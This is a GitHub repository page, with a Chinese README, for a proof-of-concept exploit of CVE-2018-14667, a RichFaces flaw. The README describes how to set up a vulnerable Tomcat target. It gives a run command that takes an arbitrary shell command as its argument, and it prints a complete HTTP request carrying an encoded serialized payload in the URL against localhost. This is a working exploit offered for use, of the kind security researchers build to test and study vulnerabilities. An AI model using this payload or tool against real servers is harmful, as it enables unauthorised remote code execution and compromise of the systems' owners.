Skip to content

Venscor/CVE-2018-14667-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
out/artifacts
out/artifacts
 
 
src/main
src/main
 
 
vul_environment
vul_environment
 
 
CVE-2018-14667-poc.iml
CVE-2018-14667-poc.iml
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 
资料.pdf
资料.pdf
 
 

Repository files navigation

CVE-2018-14667-poc Richfaces漏洞环境及PoC

靶场:vul_environment下的war包直接丢到tomcat即可

PoC

build:build artifactId
run:java -jar CVE-2018-14667-poc.jar "cmd"

about debug

直接将vul_environment下的war包下的war解压,然后从idea导入,并将tomcat下的lib添加到library path

request demo:

GET /a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAF9kr9rFEEUx18Ogz-ihR4YUgi6itxZzDZaRYtwShT2FLJEMFbvZt-ds87OzM3MnovBdDY2FlpY2NkmlX-BrWCT!8BKRIQg2Du7eyQI4lTzZr7zfZ!3ZXZ!wqKzcE3bCcMcq-u5GzNLTpeWE9t0ZDfmxZVNK26jR6hX98aPDhxL4Ay3hJ4GWnlS3sO5JMcZxhLVJH4wyon71QSOU2VE8JzCDiwkcKLQmRgLyub14gxlSU1RmcBytbao2Bg5OcZ1YbQK3iz1odFdLTOyKc7IPvr88dab91-GHegkcJJLdO4-FvQ3Q-qtUJPAcMqFN1nj4eF8Syl0nJIVKMVzHElarUzd!lIdRT7SzjGSbEj-ic7uVCbwO6HVvcLI0cHy76VPZ4enASoLKy3uP7TTZHlp6!XXg06j6x7qjtw-vHyV!trav1krzLN38PbytqVpSc6zCflBPVOvf7hNNIbhw4EMm!Yyqk1ZHTfbKJUXBUWNvsXuRcHl6FyomX5KPVVK2WdUEe9F2pC6GK8ZIwVHH-Zz8QAlLyV6bRkaE!VfAJQWuo-bzNpW81T39h9--35he72hD59iwf8nDGNCvOYPxkraUw__.jsf HTTP/1.1
Host: localhost:9999
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close

About

CVE-2018-14667-poc Richfaces漏洞环境及PoC

Resources

Readme
Activity

Stars

8 stars

Watchers

2 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages